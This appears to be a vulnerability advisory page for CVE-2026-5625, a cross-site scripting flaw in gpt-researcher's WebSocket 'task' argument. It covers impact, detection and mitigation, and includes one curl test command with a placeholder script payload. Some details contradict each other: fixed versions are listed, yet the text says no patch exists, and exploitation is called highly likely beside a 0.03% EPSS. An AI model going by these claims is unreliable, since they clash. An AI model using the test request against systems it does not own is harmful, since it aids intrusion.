Platform
javascript
Component
gpt-researcher
Opgelost in
3.4.1
3.4.2
3.4.3
3.4.4
A cross-site scripting (XSS) vulnerability has been discovered in gpt-researcher versions 3.4.0 through 3.4.3. This flaw stems from improper handling of the 'task' argument within the WebSocket Interface component. Successful exploitation allows an attacker to inject malicious scripts, potentially leading to session hijacking or defacement. The vulnerability is remotely exploitable and a public proof-of-concept is available, highlighting the urgency of remediation.
The primary impact of CVE-2026-5625 is the potential for cross-site scripting (XSS) attacks. An attacker could leverage this vulnerability to inject malicious JavaScript code into the gpt-researcher application. This could allow them to steal user session cookies, redirect users to phishing sites, or deface the application's interface. Given the public availability of an exploit, the risk of exploitation is elevated. The WebSocket Interface component is likely used for communication between the client and server, making it a critical attack vector. The lack of response from the project developers further exacerbates the risk, as timely security updates are unlikely.
CVE-2026-5625 is a publicly disclosed vulnerability with a readily available proof-of-concept. This significantly increases the likelihood of exploitation. The vulnerability was reported to the project on 2026-04-06, but there has been no response, indicating a potential lack of active maintenance. The EPSS score is likely to be medium or high due to the public exploit and lack of developer response. Monitor for unusual WebSocket traffic and suspicious JavaScript execution within the gpt-researcher application.
Applications utilizing gpt-researcher versions 3.4.0 through 3.4.3 are at risk, particularly those exposing the WebSocket Interface to untrusted users. Systems with weak input validation or inadequate output encoding are especially vulnerable. Users relying on gpt-researcher for sensitive data processing or authentication are at higher risk of compromise.
• javascript / web: Inspect network traffic for unusual WebSocket messages containing suspicious JavaScript code. Use browser developer tools to monitor for XSS alerts. • generic web: Examine access logs for requests containing potentially malicious payloads in the 'task' parameter. Look for patterns indicative of XSS attempts. • generic web: Check response headers for Content-Security-Policy (CSP) directives. Ensure CSP is enabled and configured to restrict script execution from untrusted sources.
curl -s -X POST 'http://your-gpt-researcher-instance/websocket' -d 'task=<malicious_script>' | grep -i 'alert' # Basic check for XSS payloaddisclosure
poc
Exploit Status
EPSS
0.03% (11% percentiel)
CISA SSVC
CVSS-vector
The recommended mitigation for CVE-2026-5625 is to upgrade to a patched version of gpt-researcher. As no fixed version is currently available, immediate action is required. Implement strict input validation on the 'task' argument, ensuring it conforms to expected formats and lengths. Employ robust output encoding to prevent injected scripts from being executed by the browser. Consider implementing a Web Application Firewall (WAF) with rules to detect and block XSS attempts targeting the WebSocket Interface. Regularly review and update security policies to address emerging threats.
Actualice a una versión corregida de gpt-researcher que solucione la vulnerabilidad de XSS. Verifique la documentación del proyecto o el repositorio para obtener instrucciones específicas de actualización. Hasta que se publique una versión corregida, evite el uso de la aplicación y la manipulación de los argumentos de la tarea.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2026-5625 is a cross-site scripting (XSS) vulnerability affecting gpt-researcher versions 3.4.0–3.4.3. It allows attackers to inject malicious scripts via manipulation of the 'task' argument.
If you are using gpt-researcher versions 3.4.0 through 3.4.3 and have not upgraded, you are potentially affected by this XSS vulnerability.
Upgrade to a patched version of gpt-researcher. As no patch is available, implement input validation and output encoding as immediate mitigations.
A public proof-of-concept exists, indicating a high probability of active exploitation. Monitor your systems for suspicious activity.
As of the current date, no official advisory has been released by the gpt-researcher project. Monitor the project's repository and communication channels for updates.
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.